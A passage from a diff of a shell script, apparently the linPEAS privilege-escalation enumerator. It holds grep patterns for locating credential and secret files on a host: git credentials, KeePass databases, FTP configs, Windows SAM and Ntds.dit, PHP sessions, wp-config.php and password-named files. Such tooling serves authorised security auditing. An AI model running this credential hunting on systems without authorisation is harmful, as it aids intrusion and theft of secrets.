"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/var|^/usr|^/etc" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E 
"^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e 
"$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "access\.log$|error\.log$" 
| sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e 
"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) + PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 
"^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e 
"$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_MARIADB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) + PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e 
"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e 